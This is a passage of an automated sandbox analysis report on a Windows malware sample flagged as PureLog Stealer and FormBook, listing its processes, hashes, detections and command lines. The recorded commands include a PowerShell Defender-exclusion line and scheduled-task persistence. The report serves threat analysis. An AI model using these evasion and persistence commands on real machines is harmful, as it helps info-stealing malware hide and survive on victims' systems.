                          Jul 18, 2024 07:58:51.690507889 CEST1236INData Raw: 70 fa e0 4c df e5 b9 ad 11 fa ae cf 06 4d 17 a2 e3 d9 19 6b b4 0e 0e 76 c4 b4 5b 67 d6 11 91 d3 91 55 74 30 8b 76 44 a8 d3 c2 ac cd 3c 80 42 51 53 2f ea 05 63 8c 02 25 46 18 14 f6 a9 9a 42 b2 40 25 93 e2 66 53 d0 13 52 5f c6 cd 33 5a 18 cc 70 65
                          Data Ascii: pLMkv[gUt0vD<BQS/c%FB@%fSR_3Zpe*R%S:8XW'ahG/r$to>8x$x9H52e(oRc-wKwtYi=4sVxDk~UF$|><x=ElwEH6|


                          Statistics

                          CPU Usage

                          Click to jump to process

                          Memory Usage

                          Click to jump to process

                          High Level Behavior Distribution

                          Click to dive into process behavior distribution

                          Behavior

                          Click to jump to process

                          System Behavior

                          General

                          Target ID:0
                          Start time:01:56:44
                          Start date:18/07/2024
                          Path:C:\Users\user\Desktop\Inquiry files v2.exe
                          Wow64 process (32bit):true
                          Commandline:"C:\Users\user\Desktop\Inquiry files v2.exe"
                          Imagebase:0xaa0000
                          File size:807'432 bytes
                          MD5 hash:9C2717586122DB3E57BA56513F66E1B8
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Yara matches:
                          • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.2227220590.0000000007630000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.2222224307.0000000002F71000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                          Reputation:low
                          Has exited:true

                          General

                          Target ID:3
                          Start time:01:56:52
                          Start date:18/07/2024
                          Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                          Wow64 process (32bit):true
                          Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\WOzeoJQi.exe"
                          Imagebase:0x1000000
                          File size:433'152 bytes
                          MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:high
                          Has exited:true

                          General

                          Target ID:4
                          Start time:01:56:52
                          Start date:18/07/2024
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff66e660000
                          File size:862'208 bytes
                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:high
                          Has exited:true

                          General

                          Target ID:5
                          Start time:01:56:52
                          Start date:18/07/2024
                          Path:C:\Windows\SysWOW64\schtasks.exe
                          Wow64 process (32bit):true
                          Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\WOzeoJQi" /XML "C:\Users\user\AppData\Local\Temp\tmp35FF.tmp"
                          Imagebase:0xab0000
                          File size:187'904 bytes
                          MD5 hash:48C2FE20575769DE916F48EF0676A965
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:high
                          Has exited:true

                          General

                          Target ID:6
                          Start time:01:56:52
                          Start date:18/07/2024
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff66e660000
                          File size:862'208 bytes
                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:high
                          Has exited:true

                          General

                          Target ID:7
                          Start time:01:56:53
                          Start date:18/07/2024
                          Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                          Wow64 process (32bit):true
                          Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                          Imagebase:0x870000
                          File size:45'984 bytes
                          MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Yara matches:
                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.2580516163.0000000003810000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000007.00000002.2580516163.0000000003810000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.2569102143.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000007.00000002.2569102143.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.2571952435.0000000001620000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000007.00000002.2571952435.0000000001620000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                          Reputation:high
                          Has exited:true

                          General

                          Target ID:8
                          Start time:01:56:54
                          Start date:18/07/2024
                          Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                          Imagebase:0x7ff717f30000
                          File size:496'640 bytes
                          MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                          Has elevated privileges:true
                          Has administrator privileges:false
                          Programmed in:C, C++ or other language
                          Reputation:high
                          Has exited:true

                          General

                          Target ID:9
                          Start time:01:56:55
                          Start date:18/07/2024
                          Path:C:\Users\user\AppData\Roaming\WOzeoJQi.exe
                          Wow64 process (32bit):true
                          Commandline:C:\Users\user\AppData\Roaming\WOzeoJQi.exe
                          Imagebase:0x1e0000
                          File size:807'432 bytes
                          MD5 hash:9C2717586122DB3E57BA56513F66E1B8
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:C, C++ or other language
                          Yara matches:
                          • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000009.00000002.2482574728.000000000279C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                          Antivirus matches:
                          • Detection: 100%, Joe Sandbox ML
                          • Detection: 66%, ReversingLabs
                          • Detection: 48%, Virustotal, Browse
                          Reputation:low
                          Has exited:true

                          General

                          Target ID:11
                          Start time:01:57:02
                          Start date:18/07/2024
                          Path:C:\Windows\SysWOW64\schtasks.exe
                          Wow64 process (32bit):true
                          Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\WOzeoJQi" /XML "C:\Users\user\AppData\Local\Temp\tmp5B3B.tmp"
                          Imagebase:0xab0000
                          File size:187'904 bytes
                          MD5 hash:48C2FE20575769DE916F48EF0676A965
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:C, C++ or other language
                          Reputation:high
                          Has exited:true

                          General

                          Target ID:12
                          Start time:01:57:02
                          Start date:18/07/2024
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff66e660000
                          File size:862'208 bytes
                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:C, C++ or other language
                          Reputation:high
                          Has exited:true

                          General

                          Target ID:13
                          Start time:01:57:02
                          Start date:18/07/2024
                          Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                          Wow64 process (32bit):true
                          Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                          Imagebase:0xcc0000
                          File size:45'984 bytes
                          MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:C, C++ or other language
                          Reputation:high
                          Has exited:true

                          General

                          Target ID:15
                          Start time:01:57:22
                          Start date:18/07/2024
                          Path:C:\Program Files (x86)\McEirohKWUkqujMrtjMiNZKWqtdmjbsDRNUXeiFWQcvHRUhtEkxQVAZGksndZFPlESH\YIJBuAgnqfKMtZ.exe
                          Wow64 process (32bit):true
                          Commandline:"C:\Program Files (x86)\McEirohKWUkqujMrtjMiNZKWqtdmjbsDRNUXeiFWQcvHRUhtEkxQVAZGksndZFPlESH\YIJBuAgnqfKMtZ.exe"
                          Imagebase:0x3e0000
                          File size:140'800 bytes
                          MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:C, C++ or other language
                          Yara matches:
                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000F.00000002.3374402396.0000000001680000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000F.00000002.3374402396.0000000001680000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000F.00000002.3375661404.00000000031C0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000F.00000002.3375661404.00000000031C0000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                          Reputation:high
                          Has exited:false

                          General

                          Target ID:16
                          Start time:01:57:24
                          Start date:18/07/2024
                          Path:C:\Windows\SysWOW64\runas.exe
                          Wow64 process (32bit):true
                          Commandline:"C:\Windows\SysWOW64\runas.exe"
                          Imagebase:0x880000
                          File size:17'920 bytes
                          MD5 hash:13646BC81C39130487DA538B2DED5B28
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:C, C++ or other language
                          Yara matches:
                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000010.00000002.3371782022.0000000002E10000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000010.00000002.3371782022.0000000002E10000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000010.00000002.3374604831.0000000004AE0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000010.00000002.3374604831.0000000004AE0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000010.00000002.3374530028.0000000004A90000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000010.00000002.3374530028.0000000004A90000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                          Reputation:moderate
                          Has exited:false

                          General

                          Target ID:19
                          Start time:01:58:05
                          Start date:18/07/2024
                          Path:C:\Program Files\Mozilla Firefox\firefox.exe
                          Wow64 process (32bit):false
                          Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                          Imagebase:0x7ff728280000
                          File size:676'768 bytes
                          MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:C, C++ or other language
                          Reputation:high
                          Has exited:true

                          Disassembly

                          Reset < >